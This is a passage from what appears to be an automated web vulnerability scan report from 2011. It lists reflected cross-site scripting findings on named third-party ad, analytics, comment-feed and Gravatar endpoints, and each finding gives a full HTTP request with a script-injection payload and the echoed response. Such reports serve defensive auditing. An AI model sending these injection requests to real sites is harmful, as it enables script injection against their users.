p6QYsvgf51m9Da6XiirwxBVxp0nP77W3oMweEdXU6bnuSFykW54FN6yii1oRyCQGqk84Nzl6iivmHYAZUugJ8wSyDpwAsYYmSo3LDnHii2Cip8QnOcWG7PlEjokDX1b7LIGtQieie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Tue, 14 Jun 2011 00:14:59 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 84
Connection: keep-alive

Unknown API key: (r9t72482usanbp6sphprhvunbaefe<script>alert(1)</script>f74b73704e0)
3.9. http://ar.voicefive.com/b/node_rcAll.pli [func parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 98602<script>alert(1)</script>d7cd6ea1cb was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run98602<script>alert(1)</script>d7cd6ea1cb&1308010663788 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:44 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Thu 18-Sep-2008 00:17:44 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1556

COMSCORE.BMX.Buddy.run98602<script>alert(1)</script>d7cd6ea1cb({ "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32
...[SNIP]...
3.10. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 33f79<script>alert(1)</script>0582dfaaac5 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=233f79<script>alert(1)</script>0582dfaaac5&c2=6036034&c3=&c4=/ontv/&c5=20000&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/ontv/
Cookie: UID=f68656b-184.84.69.32-1306935678

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 20 Jun 2011 17:45:48 GMT
Date: Mon, 13 Jun 2011 17:45:48 GMT
Content-Length: 1245
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"233f79<script>alert(1)</script>0582dfaaac5", c2:"6036034", c3:"", c4:"/ontv/", c5:"20000", c6:"", c10:"", c15:"", c16:"", r:""});


3.11. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload ed9b7<script>alert(1)</script>76715acdffe was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6036034&c3=&c4=/ontv/&c5=20000&c6=&c15=ed9b7<script>alert(1)</script>76715acdffe HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/ontv/
Cookie: UID=f68656b-184.84.69.32-1306935678

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 20 Jun 2011 17:45:54 GMT
Date: Mon, 13 Jun 2011 17:45:54 GMT
Content-Length: 3599
Connection: close

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"6036034", c3:"", c4:"/ontv/", c5:"20000", c6:"", c10:"", c15:"ed9b7<script>alert(1)</script>76715acdffe", c16:"", r:""});


3.12. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 9d049<script>alert(1)</script>23421510a6e was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=60360349d049<script>alert(1)</script>23421510a6e&c3=&c4=/ontv/&c5=20000&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/ontv/
Cookie: UID=f68656b-184.84.69.32-1306935678

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 20 Jun 2011 17:45:49 GMT
Date: Mon, 13 Jun 2011 17:45:49 GMT
Content-Length: 3599
Connection: close

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"60360349d049<script>alert(1)</script>23421510a6e", c3:"", c4:"/ontv/", c5:"20000", c6:"", c10:"", c15:"", c16:"", r:""});


3.13. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 99270<script>alert(1)</script>dde17540461 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6036034&c3=99270<script>alert(1)</script>dde17540461&c4=/ontv/&c5=20000&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/ontv/
Cookie: UID=f68656b-184.84.69.32-1306935678

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 20 Jun 2011 17:45:50 GMT
Date: Mon, 13 Jun 2011 17:45:50 GMT
Content-Length: 3599
Connection: close

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
ry{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"6036034", c3:"99270<script>alert(1)</script>dde17540461", c4:"/ontv/", c5:"20000", c6:"", c10:"", c15:"", c16:"", r:""});


3.14. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload dbdf5<script>alert(1)</script>0949ac68ed9 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6036034&c3=&c4=/ontv/dbdf5<script>alert(1)</script>0949ac68ed9&c5=20000&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/ontv/
Cookie: UID=f68656b-184.84.69.32-1306935678

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 20 Jun 2011 17:45:51 GMT
Date: Mon, 13 Jun 2011 17:45:51 GMT
Content-Length: 3599
Connection: close

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"6036034", c3:"", c4:"/ontv/dbdf5<script>alert(1)</script>0949ac68ed9", c5:"20000", c6:"", c10:"", c15:"", c16:"", r:""});


3.15. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 200b9<script>alert(1)</script>b8a7f3d243d was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6036034&c3=&c4=/ontv/&c5=20000200b9<script>alert(1)</script>b8a7f3d243d&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/ontv/
Cookie: UID=f68656b-184.84.69.32-1306935678

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 20 Jun 2011 17:45:51 GMT
Date: Mon, 13 Jun 2011 17:45:51 GMT
Content-Length: 3599
Connection: close

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
score;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"6036034", c3:"", c4:"/ontv/", c5:"20000200b9<script>alert(1)</script>b8a7f3d243d", c6:"", c10:"", c15:"", c16:"", r:""});


3.16. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 45df9<script>alert(1)</script>408425a65e6 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6036034&c3=&c4=/ontv/&c5=20000&c6=45df9<script>alert(1)</script>408425a65e6&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/ontv/
Cookie: UID=f68656b-184.84.69.32-1306935678

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 20 Jun 2011 17:45:53 GMT
Date: Mon, 13 Jun 2011 17:45:53 GMT
Content-Length: 3599
Connection: close

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
or(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"6036034", c3:"", c4:"/ontv/", c5:"20000", c6:"45df9<script>alert(1)</script>408425a65e6", c10:"", c15:"", c16:"", r:""});


3.17. http://daapiak.flux.com/2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Comments/-/threaded [includeWBR&callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://daapiak.flux.com
Path:   /2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Comments/-/threaded

Issue detail

The value of the includeWBR&callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 48db4%3balert(1)//62468e88888 was submitted in the includeWBR&callback parameter. This input was echoed as 48db4;alert(1)//62468e88888 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Comments/-/threaded?q=mgid%3Acms%3Aitem%3Amtv.com%3A10325912&start-index=1&max-results=20&commentId=-1&includeWBR&callback=FD0607159300748db4%3balert(1)//62468e88888 HTTP/1.1
Host: daapiak.flux.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTUID=BD68167B-8714-4A0A-8544-E6985A15524C

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
Server: w09g
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
App: wg
Content-Length: 32486
Cache-Control: max-age=600
Date: Tue, 14 Jun 2011 00:27:54 GMT
Connection: close

if (typeof(FD0607159300748db4;alert(1)//62468e88888) == 'function'){FD0607159300748db4;alert(1)//62468e88888({"EndIndex":20,"IsFirstPage":true,"IsLastPage":false,"Items":[{"ChildComments":null,"Creator":{"InitialConnection":1,"LoginName":null,"ProfileU
...[SNIP]...
3.18. http://daapiak.flux.com/2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/ [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://daapiak.flux.com
Path:   /2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/

Issue detail

The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 961e7%3balert(1)//89daa690b16 was submitted in the callback parameter. This input was echoed as 961e7;alert(1)//89daa690b16 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/?q=mgid%3Auma%3Avideolist%3Amtv.com%3A1665248&callback=F759D20533007961e7%3balert(1)//89daa690b16 HTTP/1.1
Host: daapiak.flux.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/shows/teen_wolf/series.jhtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTUID=BD68167B-8714-4A0A-8544-E6985A15524C

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
Server: w04g
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
App: wg
Content-Length: 4161
Cache-Control: max-age=600
Date: Tue, 14 Jun 2011 00:19:19 GMT
Connection: close

if (typeof(F759D20533007961e7;alert(1)//89daa690b16) == 'function'){F759D20533007961e7;alert(1)//89daa690b16({"Title":"Teen Wolf | Ep. 2 | Second Chance At First Line","Ucid":"D3FCFFFF0002D51D001B01467146","Thumbnails":{"__type":"VideoThumbnailsData","
...[SNIP]...
3.19. http://daapiak.flux.com/2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/Usage [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://daapiak.flux.com
Path:   /2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/Usage

Issue detail

The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5c20c%3balert(1)//bdd2a2a47da was submitted in the callback parameter. This input was echoed as 5c20c;alert(1)//bdd2a2a47da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/Usage?q=mgid%3Acms%3Aitem%3Amtv.com%3A10325912&callback=F9A3A187B30075c20c%3balert(1)//bdd2a2a47da HTTP/1.1
Host: daapiak.flux.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTUID=BD68167B-8714-4A0A-8544-E6985A15524C

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
Server: w08g
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
App: wg
Content-Length: 583
Cache-Control: max-age=600
Date: Tue, 14 Jun 2011 00:20:25 GMT
Connection: close

if (typeof(F9A3A187B30075c20c;alert(1)//bdd2a2a47da) == 'function'){F9A3A187B30075c20c;alert(1)//bdd2a2a47da({"CommentCount":34,"CommentData":null,"GainRatingCount":0,"IsFirstPage":false,"IsInvisible":false,"IsLastPage":false,"OverallFiveStarRating":0,
...[SNIP]...
3.20. http://daapiak.flux.com/2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/UI/ShareService/Services [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://daapiak.flux.com
Path:   /2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/UI/ShareService/Services

Issue detail

The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload cdf46%3balert(1)//305c1f01dcb was submitted in the callback parameter. This input was echoed as cdf46;alert(1)//305c1f01dcb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/UI/ShareService/Services?earlyServicesOnly=true&callback=F6C1C761B3007cdf46%3balert(1)//305c1f01dcb HTTP/1.1
Host: daapiak.flux.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTUID=BD68167B-8714-4A0A-8544-E6985A15524C

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
Server: w10g
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
App: wg
Content-Length: 3629
Cache-Control: max-age=600
Date: Tue, 14 Jun 2011 00:20:23 GMT
Connection: close

if (typeof(F6C1C761B3007cdf46;alert(1)//305c1f01dcb) == 'function'){F6C1C761B3007cdf46;alert(1)//305c1f01dcb([{"__type":"ExternalShareServiceData","LargeThumbnailUrl":"http:\/\/static0.fluxstatic.com\/-\/Clients\/Common\/Img\/ExternalCommunityThumbnail
...[SNIP]...
3.21. http://en.gravatar.com/site/implement [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://en.gravatar.com
Path:   /site/implement

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14fe1"><a>158c986cf81 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /site14fe1"><a>158c986cf81/implement HTTP/1.1
Host: en.gravatar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=236484949.1308011412.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=236484949.232928841.1308011412.1308011412.1308011412.1; __utmc=236484949; __utmb=236484949.1.10.1308011412; __qca=P0-894869797-1308011414185

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:33:37 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
P3P: CP="CAO PSA"
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 14 Jun 2011 00:33:37 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 8537

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<
...[SNIP]...
<a href="http://en.gravatar.com/site14fe1"><a>158c986cf81/implement.json">
...[SNIP]...
3.22. http://en.gravatar.com/site/login/%252F [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://en.gravatar.com
Path:   /site/login/%252F

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f83a0"><a>822417fb1b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sitef83a0"><a>822417fb1b/login/%252F HTTP/1.1
Host: en.gravatar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
